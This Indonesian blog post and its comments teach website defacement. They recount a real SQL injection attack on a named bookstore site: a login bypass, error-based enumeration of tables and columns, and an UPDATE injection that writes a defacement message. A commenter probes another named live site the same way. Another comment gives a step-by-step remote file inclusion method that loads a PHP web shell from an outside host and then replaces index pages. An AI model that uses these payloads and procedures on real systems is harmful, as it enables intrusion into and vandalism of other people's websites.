Deface: SQL Injection Part-1
Deface membutuh seni. Seni Deface=sebuah identify of hacker dalam memperkenalkan eksistensi diri, bagaiman menemukan bug/kelemahan dan cara masuk ke system target. Pengertian sosial enginering merupakan hal utama dan dasar yg harus dipelajari bagi ‘new comer’ hacker. Deface ialah seni utama dimana setiap orang memiliki ciri tersendiri dalam melakukannya, kita dapat menilai tingkat ke ahlian sang hacker dalam deface. Hacker memiliki kunci spesial akses yang menunjukan kelebihan mereka dengan permahaman sbb:
- Kenali target mu, tujuannya berbagi perasaan sayang.
- Yakinkan hati kita, mampu kah mencuri “hati” target dengan saluran aliran data dengan kemampuan sosial enginering.
- Ada pepatah “banyak jalan menuju China” Tidak bisa tembus web, coba aja loe beli hosting yg satu server dengan target, emang harus bermodal coz no education free now

- Rajin bertanya sama mbah google “alkitab hacker’ www.google.com
- Di atas gunung masih ada gunung, maka belajarlah banyak dari hal yang tak terhingga, semampu kita
Kalo sudah siap, saatnya dicoba, berikut ini hanya sebatas TRY alias latihan (memang sih cara kuno tapi cukup ampuh buah belajar). Latihan ini di ambil dari VIROLOG.info , silahkan dicoba, Maaf jika sudah kadaluarso.
|
Hacking/Cracking : Beli Buku Gratis Apa Diface Yach????(SQL-Injection bug in gramedia) By. 4L13N Posted by admin on 2007/6/6 23:17:31 (1958 reads) |
| Sebelumnya Gw minta maaf Ama www.gramedia.com NB: Gw Cuma Anak Ingusan Yang slalu ingin tau jadi buat yang udeh master lewatin aja oke!!!!Sabtu 2-juni-2007 jam 10 malem Iseng-iseng gw surfing ke situs www.gramedia.com niatnya sey liat-liat buku tiba-tiba ada setan yang bisikin “woi coba dong neh situs” iya coba-coba ga bayar kan???? ya udeh gw klik halaman member truz gw coba pake SQL_Injection dengan username: admin Password: ‘or ”=’ wah gileee bisa masuk, gak nyangka situs sekelas gramedia masih kena ama bug’s kaya gini, dalem hati gw ngomong “woii admin Why???hehe33x bisa beli buku gratis neyyy” kaga’ ah, gw ga’ mw jadi kriminal, logout aja ah!!! lagi-lagi, setan keparat bisikin “Udeh deface tuh situs!!!!” ehmm gimana ya?? udeh kepalang tanggung!! pake cara apa ya, yang enak???Oiya, Update database server aja ahh!!! saatnya mencari informasi, gw buka: http://www.gramedia.com/detil_newsevent.asp?id=061110102137 buat nyari error gw tambahin tanda kutip satu dielakang jadinya kaya gini: wahhh ada, errornya!!! inject ahh buat nyari nama tabel n colomnya pake perintah ‘Having 1=1– [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.NEWSEVENT_ID’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. wahh udaeh dapet nama tabel n kolum pertamanya “td_newsevent nama tabel n NEWSEVENT_ID nama kolum” terusin ahh!!! [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.JUDUL’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Udeh dapet ney kolum JUDUL looping lagi ahh!!! http://www.gramedia.com/detil_newsevent.asp?id=061110102137%20‘group%20by%20td_newsevent.NEWSEVENT_ID,JUDUL– Error_Nya : [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.PENULIS’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Wahh kali ini kolum PENULIS gw looping lagihttp://www.gramedia.com/detil_newsevent.asp?id=061110102137%20‘group%20by%20td_newsevent.NEWSEVENT_ID,JUDUL,PENULIS– truz errornya: (udeh ya gw cape ngetiknya pokoknya nama kolum-kolumnya iniJ ) NEWSEVENT_ID JUDUL PENULIS SUMMARY DESCRIPTION STATUSWawwww Informasinya udeh cukup neyyy…. deface-deface, tiba saatnya untuk menginjeksi database_nya disini gw pake perintah ‘Update+nama_tabel+set+nama_kolum=’pesan’;– jadinya kaya gini: http://www.gramedia.com/detil_newsevent.asp?id=061110102137%20‘update+td_newsevent+set+DESCRIPTION=” <”font%20color=red><”marquee>4L13N%20FOUND%20BUG%20PLEASE%20PATCH%20YOUR%20SYSTEM‘;– Kritik,Saran,Cacian n Makian mail To here_4l13n@yahoo.com kalo pujian kirim ke_ ALLAH SWT N Rosul2xnya Salam Hangat By. 4L13N |
Maret 4, 2008 at 8:56 am
mas..
ini bisa buat testing gak?
http://www.gianyartourism.com/id.news.asp?lihat=detail&id=N77668670
MrSinggih : Coba ya mas …
http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘
Microsoft JET Database Engine error ‘80040e14′
Syntax error in string in query expression ‘id_keg=’A98435693”’.
/id.agenda.asp, line 51
http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘Having1=1-
Microsoft JET Database Engine error ‘80040e14′
Syntax error (missing operator) in query expression ‘id_keg=’A98435693′Having1=1-”.
/id.agenda.asp, line 51
http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘Group%20by%20id_keg.’A98435693′-
Microsoft JET Database Engine error ‘80040e14′
Syntax error in string in query expression ‘id_keg.’A98435693′-”.
/id.agenda.asp, line 51
Dst….
Nanti saya ndak keterusan mas. Di coba sendiri saja. Monggo
Maret 27, 2008 at 12:48 am
Tutorial Cara deface yang Nyaman dan Enak Tenan …
1. Buka http://www.milw0rm. com
2. klik Search
3. ketik RFI (Remote File Inclusion)
4. Cari Exploit terbaru atau CMS/Aplikasi yang terkenal
5. Buka Google, dan liat Advisor yang kita pilih tersebut
6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut,
* Jika tidak gunakanlah Judul dari Exploit tersebut
7. Setelah dapat hasil dari Google, klik kanan Open NewTab [Nah ini
untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB]
8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu
rasa penuh Browsernya
9. Coba satu persatu dari hasil tersebut dengan Exploit Command yang
terdapat di advisor
10. Jika terjadi pesan error, cari Pesan error yang menyatakan
kegagalan File Inclusion, bukan File Not Found.
11. Jika menemukan File Not Found kemungkinan; salah Relative Path
dari Site tersebut, atau memang beda versi, dan kemungkinan lain.
12. Jika menemukan pesan error dari File Inclusion, atau Blank Putih
tanpa Pesan Error,
13. Ganti command exploit setelah tanda ‘=’[sama dengan] dengan
http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif]
14. Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan
menampilkan PHPShell r57shell atau hanya Blank Page, dan muncul
kembali File Inclusion
15. Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke
pencarian File dan Direktory yang memiliki full akses atau -rwxrwxrwx
/ -rw-rw-rw <– untuk file | drwxrwxrwx / drw-rw-rw <– untuk direktory
16. Jika telah mendapatkan file atau direktory diatas tersebut, kamu
bisa mengupload file index.html versi buatan kamu, atau mengubah
index.php or .html dengan versi code kamu jgn lupa nama decoding
dikibarkan disana…
17. Setelah merubah file tersebut. Coba kamu lihat di browser sesuai
dengan relatife path yang kamu ubah tadi (Original post by ping_win)
Mei 20, 2008 at 7:21 am
[...] Deface: SQL Injection Part-1 [...]
Juli 19, 2008 at 2:13 pm
bingung..maklum banyak job kali..^^.
Juli 27, 2008 at 4:38 am
[...] Cara Deface Yang Nyaman from bestfuture.wordpress.com [...]